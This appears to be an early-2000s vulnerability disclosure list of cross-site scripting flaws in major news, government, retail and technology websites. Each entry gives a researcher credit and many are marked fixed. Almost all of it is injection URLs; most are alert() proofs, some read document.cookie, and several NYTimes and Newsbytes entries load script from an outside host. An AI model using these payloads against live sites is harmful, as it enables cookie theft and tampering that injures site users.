News Media -
TOP
LA Times
01) Subversion of Information Vulnerability
http://latimes.com/search/lat_all.jsp?Query=</script>
Credit: Jeremiah Jacks
OC Register
01) http://www.ocregister.com/cgi-bin/htdig/htsearch2?words=">><script>alert%28'test'%29%3B</script>
Credit: Jeremiah Jacks - FIXED
NY Times
01) Subversion of Information Vulnerability
http://www.nytimes.com/corrections.html?pagewanted=">><script>document.writeln('('src=http://pointblanksecurity.com/css/nytimes.js><\/script>');</script>
Credit: Jeremiah Jacks
02) http://www.nytimes.com/auth/login?URI=">><script>alert('nytimes')</script>
Credit: Dmitry Golubev - FIXED
03) http://realestate.nytimes.com/rentals/SearchZipWId.asp?p=">><script>alert('test');</script>
Credit: Jeremiah Jacks
04) http://realestate.nytimes.com/rentals/search.asp?ros=r&ST=NY&CN=">><script>alert('test');</script>&p=C
Credit: Jeremiah Jacks - FIXED
The Washington Post
01) Subversion of Information Vulnerability
http://www.washingtonpost.com/ac3/ContentServer?pagename=world/worldsearch&COUNTRY=.com/css/washpost.js></script>
Credit: Jeremiah Jacks
02) Subversion of Information Vulnerability
http://www.washingtonpost.com/ac3/ContentServer?pagename=weather&zipcode=post.js></script>
Credit: Jeremiah Jacks
03) http://mp3.washingtonpost.com/browse/index.shtml?band_name=><script>alert('test');</script>&genre_id=100&hometown_id=100
Credit: Jeremiah Jacks - FIXED
04) http://eg.washingtonpost.com/search?cslink=cs_keyword_home&type=bridge&query=%3Cscript%3Ealert%28%27test%27
%29%3B%3C%2Fscript%3E
Credit: Jeremiah Jacks
Newsbytes
01) Subversion of Information Vulnerability
http://www.newsbytes.com/cgi-bin/udt/mlm.user.register?client.id=newsbytes&email.address=">><script>function+Chr(code)
{return+String.fromCharCode(code);}document.writeln('('http://pointblanksecurity.com/css/newsbytes.js><\/script>');</script>
Credit: Jeremiah Jacks
02) Subversion of Information Vulnerability
http://www.newsbytes.com/cgi-bin/udt/mlm.user.view?client.id=newsbytes&user.email=-->><script>function+Chr(code)
{return+String.fromCharCode(code);}document.writeln('('http://pointblanksecurity.com/css/newsbytes.js><\/script>');</script>
Credit: Jeremiah Jacks
Newsday
01) http://www.newsday.com/search/ny_all.jsp?Query=-%3E%3Cscript%3Ealert%28%27test%27%29%3B%3C%2Fscript
%3E%3C%21--
Credit: Gary Jones - FIXED
American Stock Exchange
01) http://search.amex.com/a/search_results.asp?query=-->><script>alert('test');</script>
Credit: Jeremiah Jacks - FIXED
NYSE
01) http://www.nyse.com/s97is.vts?Action=FilterSearch&Filter=">><script>alert(document.cookie);</script>
Credit: Jeremiah Jacks - FIXED
Discovery Channel
01) http://dsc.discovery.com/search/results.jsp?channel=DSC&srchtxt=nss">><script>alert(document.cookie)</script>
Credit: Dmitry Golubev
People Magazine
01) http://people.aol.com/people/search/results/1,11400,,00.html?query=><script>alert('test');</script>
Credit: Jeremiah Jacks - FIXED
CBS MarketWatch
01) http://cbs.marketwatch.com/tools/quotes/basic.asp?symb=">><script>alert('test');</script>
Credit: Jeremiah Jacks
TIME Magazine
01) http://www.time.com/time/searchresults?summaries=yes&search_type=simple&query=><script>alert('test');</script>
Credit: Jeremiah Jacks - FIXED
WorldNews
01) http://www.worldnews.com/?template=><script>alert('test');</script>
Credit: Jeremiah Jacks - FIXED
BBC
01) http://www.bbc.co.uk/cgi-perl/h2/h2.cgi?x=">><script>alert("beep!")</script>&state=password&board=mc
Credit: Dmitry Golubev - FIXED
The Register
01) http://www.theregister.co.uk/cgi-bin/dispatcher.cgi?url=nss><script>alert(document.location)</script>
Credit: Dmitry Golubev - FIXED
CNET
01) http://cnet.search.com/search?q=">><script>alert("cnet")</script><"
Credit: Dmitry Golubev - FIXED
CNN Money - LookSmart
01) http://cnnfn.looksmart.com/r_search?key=><script>alert('test');</script>
Credit: Jeremiah Jacks
CNN.com - LookSmart
01) http://cnn.looksmart.com/r_search?&izch&pin=">><script>alert('test');</script>
Credit: Jeremiah Jacks - FIXED
BusinessWeek
01) http://search.businessweek.com/search97cgi/s97_cgi?action=FilterSearch&filter=><script>alert('test');</script>
Credit: Jeremiah Jacks
The Boston Globe
01) http://search.boston.com/globe.vts?Action=><script>alert('yee+haw');</script>
Credit: Esther Matut
ESPN
01) http://keyword.espn.go.com/keyword/espnlookup?qt=%3Cscript%3E+alert%28%27hi%27%29%3B+%3C%2Fscript%3E
Credit: Esther Matut - FIXED
Government Agencies
- TOP
California, USA
01) http://www.ca.gov/state/portal/myca_search_results.jsp?sSearchString=%3Cscript%3E+alert%28%27hi%27%29%3B+
%3C%2Fscript%3E
Credit: Esther Matut
FirstGOV
01) http://www.firstgov.gov/fedsearch4/index.jsp?mt0=all&ms0=should&mw0=%3Cscript%3E+alert%28%27hi%27%29%3B+
%3C%2Fscript%3E&db=www&st=AS
Credit: Esther Matut
02) http://www.firstgov.gov/external/><script>alert('test');</script>
Credit: Jeremiah Jacks
US DoJ
01) http://www.ojp.usdoj.gov/search97cgi/s97_cgi?action=Action=FilterSearch&Filter=">><script>alert("dep%20of%20justice@!")
</script>
Credit: Gary Jones
US Federal Reserve
01) http://search.federalreserve.gov/search97cgi/s97_cgi.exe?Action=FilterSearch&Filter=">><script>alert("gimme%20some
%20money!%20please?%20:)")</script>
Credit: Gary Jones - FIXED
The White House
01) http://www.whitehouse.gov/cgi-bin/good-bye.cgi?url=/">><script>alert("white+house!")</script>
Credit: Dmitry Golubev - FIXED
The FBI
01) http://www.fbi.gov/cgi-bin/outside.cgi?/">><script>alert("FBI")</script>
Credit: Dmitry Golubev - FIXED
Department of Defense(DoD)
01) http://www.defenselink.mil/search97/s97is.vts?Action=FilterSearch&Filter=">><script>alert("defend")</script>
Credit: Dmitry Golubev
National Institutes of Health
01) http://search1.nci.nih.gov/search97cgi/s97_cgi?Action=FilterSearch&Filter=">><script>alert("hello")</script>
Credit: Gary Jones - FIXED
U.S. Census Bureau
01) http://www.census.gov/search97cgi/s97_cgi?Action=FilterSearch&Filter=">><script>alert("hello")</script>
Credit: Gary Jones - FIXED
U.S. House of Representatives
01) http://wwws.house.gov/search97cgi/s97_cgi?Action=FilterSearch&Filter=">><script>alert("hello")</script>
Credit: Gary Jones - FIXED
Centers for Disease Control
01) http://search.cdc.gov/search97cgi/s97_cgi.exe?Action=FilterSearch&Filter=">><script>alert("hello")</script>
Credit: Gary Jones - FIXED
FFIEC
01) http://search.ffiec.gov/search97cgi/s97_cgi.exe?Action=FilterSearch&Filter=">><script>alert("hello")</script>
Credit: Gary Jones - FIXED
FDIC
01) http://www.fdic.gov/search97cgi/s97_cgi.exe?Action=FilterSearch&Filter=">><script>alert("hello")</script>
Credit: Gary Jones - FIXED
FedStats
01) http://www.fedstats.gov/search97cgi/s97_cgi?Action=FilterSearch&Filter=">><script>alert("hello")</script>
Credit: Gary Jones - FIXED
Dept. of Education
01) http://www.ed.gov/search/searchResList.jsp?st=0&colParam=ED&lk=1&qt=%3Cscript%3E+alert%28%27hi%27%29%3B+%3C%2Fscript%3E
Credit: Esther Matut - FIXED
Online Stores -
TOP
Office Max
01) http://www.officemax.com/max/solutions/product/thumbnail.jsp?expansionOID=>><script>alert('test');</script>
Credit: Jeremiah Jacks
JCPenney
01) http://www.jcpenney.com/jcp/Department.asp?DeptID=9452&CatID=9452&CatTyp=DEP&Dep=><script>alert('test');</script>
Credit: Jeremiah Jacks
02) http://www.jcpenney.com/jcp/Products.asp?DeptID=469&CatID=10542&CatTyp=DEP&ItemTyp=G&GrpTyp=SIZ&ItemID=040f564&
ProdSeq=6&OffSet=6&ProdCount=6&Cat=sweaters><script>alert('test');</script>&Dep=men%27s&PCat=casual+shirts&PCatID=10417417
Credit: Jeremiah Jacks
03) http://www.jcpenney.com/jcp/Products.asp?DeptID=469&CatID=10079&CatTyp=DEP&ItemTyp=G&GrpTyp=SIZ&ItemID=02ac129&
ProdSeq=2&OffSet=2&ProdCount=3&Cat=jean+jackets&Dep=men%27s&PCat=jeans&PCatID=3657&SearchString=><script>alert('test');</script>
Credit: Jeremiah Jacks
eCOST
01) http://www.ecost.com/ecost/search/powersearch.asp?search_string=">><script>alert('hi');</script>
Credit: Gary Jones
Banana Republic
01) http://www.bananarepublic.com/SubDepartment.asp?loc=">><script>alert('test');</script>
Credit: Jeremiah Jacks
Barnes & Noble
01) http://shop.barnesandnoble.com/booksearch/results.asp?WRD=%3Cscript%3Ealert%28document%2Ecookie%29%3B%3C
%2Fscript%3E
Credit: Gary Jones - FIXED
02) http://shop.barnesandnoble.com/shop/cart.asp?vcqty=">><script>alert('test');</script>A+href="
Credit: Jeremiah Jacks
Office Depot
01) http://www.officedepot.com/shop/search/noresults.asp?searchquery=%3Cscript%3E+alert%28%27hi%27%29%3B+
%3C%2Fscript%3E
Credit: Gary Jones
Sears
01) http://www.sears.com/sr/mercado/searchall.jsp?keyword=><script>alert(document.cookie);</script>
Credit: Jeremiah Jacks - FIXED
BlueLight (K-Mart)
01) http://www.bluelight.com/searchHandler/index.jsp?keywords=><script>alert(document.cookie);</script>
Credit: Jeremiah Jacks
McDonald's
01) http://www.mcdonalds.com/cgi-bin/search/search.pl?terms=><script>alert('hi')</script>
Credit: Dmitry Golubev
Philip Morris Home
01) http://www.philipmorris.com/search/search_results.asp?criteria=><script>alert(document.cookie)</script>
Credit: Dmitry Golubev
WalMart
01) http://www.walmart.com/catalog/search.gsp?search_constraint=0&search_query=%3Cscript%3E+alert%28%27hi%27%29
%3B+%3C%2Fscript%3E
Credit: Esther Matut
Best Buy
01) http://www.bestbuy.com/Accessories/Acc_list.asp?m=">><script>alert('test');</script>
Credit: Jeremiah Jacks
CompUSA - https://www.compusa.com/shop/xt_account_logon.asp?xt_action=lookup&frm_email='&frm_password='
01) https://www.compusa.com/shop/account_logon.asp?errors=><script>alert(document.cookie)</script>
Credit: Dmitry Golubev
Search Engines
- TOP
Rpmfind.net
01) http://www.rpmfind.net/linux/rpm2html/search.php?query=nss">><script>alert(document.location)</script>
Credit: Dmitry Golubev
Alta Vista
01 http://altavista.com/sites/search/web?q=><script>alert('bleh');</script>
Credit: Jeremiah Jacks - FIXED
Google
01) http://www.google.com/search?q=pointblanksecurity.com/">><script>alert(document.cookie)</script>
Credit: Jeremiah Jacks - FIXED
Hot Wired
01) http://search.hotwired.com/search97/s97is.vts?Action=FilterSearch&Filter=">><script>alert("wired!")</script>
Credit: Dmitry Golubev - FIXED
Netscape
01) http://mpsearch.netscape.com/BizSearch?keyword=><script>alert(document.cookie);</script>
Credit: Jeremiah Jacks
AOL
01) http://search.hometown.aol.com/find.adp?query=">><script>alert(document.cookie);</script>
Credit: Jeremiah Jacks
Technology -
TOP
CyberArmy
01) http://www.cyberarmy.com/search/search.cgi?query=><script>alert("Test")</script>
Credit: Joerg Niebauer - FIXED
Red Hat
01) http://www.redhat.com/apps/search/results.html?search:query_cb=nss">><script>alert("redhat")</script><"
Credit: Dmitry Golubev - FIXED
Microsoft
01) http://msevents.microsoft.com/isapi/events/usa/enu/search_results.asp?KW=''>><script>alert(document.cookie);</script>
Credit: Jeremiah Jacks - FIXED
02) http://www.microsoft.com/usa/js/sendfriend.asp?sAddress=">><script>alert(document.cookie);</script>
Credit: Jeremiah Jacks - FIXED
03) (Netscape Only) http://search.microsoft.com/us/shop/SearchMS25.asp?qu=";alert
('test');//&so=RECCNT&boolean=ALL&intCat=0&nq=NEW&p=1
Credit: Jeremiah Jacks
WHOIS.net
01) http://whois.net/whois.cgi2?d=%3Cscript%3E+alert%28%27hi%27%29%3B+%3C%2Fscript%3E
Credit: Gary Jones - FIXED
01) http://www.whois.net/checkDomain.cgi2?domain=%3Cscript%3E+alert%28%27hi%27%29%3B+%3C%2F
script%3E&tld=com
Credit: Esther Matut - FIXED
Yellow Pages
01) http://www.yellowpages.com/yellowpages/scripts/search.dll?ep=0&query=><script>+alert('hi')+</script>&qstate=AL
Credit: Gary Jones - FIXED
IEEE
01) http://ieeexplore.ieee.org/search97/s97is.vts?Action=FilterSearch&Filter=">><script>alert('document.cookie')</script>
Credit: Jeremiah Jacks - FIXED
Electronic Frontier Foundation(EFF)
01) http://www.eff.org/cgi-bin/htsearch?exclude=">><script>alert(document.cookie)</script>
Credit: Dmitry Golubev
Chaos Computer Club(Germany)
01) http://www.ccc.de/cgi-bin/feedback.pl?page=><script>alert("ccc")</script>
Credit: Dmitry Golubev
IBM
01) http://commerce.www.ibm.com/cgi-bin/ncommerce/AdvantageCode?shoprfnbr=1&cntry=840&lang=en_US&
cntrfnbr=1&q=">><script>alert("ibm")</script>
Credit: Dmitry Golubev - FIXED
SourceForge
01) http://sourceforge.net/search/?words=">><script>alert(document.location)</script>
Credit: Dmitry Golubev
PHP.net
01) http://www.php.net/cal.php?a=">><script>alert(document.cookie)</script>
Credit: Dmitry Golubev - FIXED
Adobe
01) http://www.adobe.de/search97cgi/s97_cgi?Action=FilterSearch&Filter=">><script>alert("hello")</script>
Credit: Gary Jones
Apple
01) http://search03.apple.com/search97cgi/s97_cgi?Action=FilterSearch&Filter=">><script>alert("me%20likes%20red%20apples")
</script>
Credit: Gary Jones
Snort.org Discussion
01) http://snort.rapidnet.com/forum.asp?forum_id=3&forum_title=><script>alert(document.cookie)</script>
Credit: Dmitry Golubev - FIXED
Nokia (1st is Netscape only)
01) http://www.nokia.com/flashd/flash_redir.html?flash=">><script>alert("test")</script><"
Credit: Dmitry Golubev
01) http://www.nokia.com/find/forum/search.jsp?qt=nrw&la=">><script>alert("test")</script>
Credit: Dmitry Golubev
Cisco
01) http://www.cisco.com/><script>alert("test")</script>
Credit: Dmitry Golubev
FreeBSD
01) http://www.freebsd.org/><script>alert("test")</script>
Credit: Dmitry Golubev - FIXED
Gibson Research Center
01) https://grc.com/x/news.exe?cmd=xover&group=><script>alert('test');</script>
Credit: Jeremiah Jacks - FIXED
Hewlett-Packard
01) http://productfinder.support.hp.com/tps/ProductFinder?h_query=%3E%3Cscript%3Ealert%28%27test%27%29%3B%3C
%2Fscript%3E%3C%21
Credit: Gary Jones - FIXED
DSL Reports
01) http://www.dslreports.com/information/kb/</title>><script>alert('test');</script><title>
Credit: Jeremiah Jacks
Verio
01) https://home.verio.com/lookup/index.cfm?sld=><script>alert('test');</script>
Credit: Gary Jones - FIXED
Oracle
01) http://www.oracle.com/pls/use/use_query_html_v3.submit_query_input?p_adv_query_text=">><script>alert
('test');</script>&p_person_id=100&p_doc_location_array=Place+Holder&p_doc_location_array=document
&p_location_array=&p_keyword_array=&p_value_array=&p_date_begin=q_date&p_date_end=q_date
Credit: Jeremiah Jacks - FIXED
02) http://www.oracle.com/pls/ebn/search.simple?p_string=><script>alert(document.cookie);</script>
Credit: Esther Matut - FIXED
Miscellaneous -
TOP
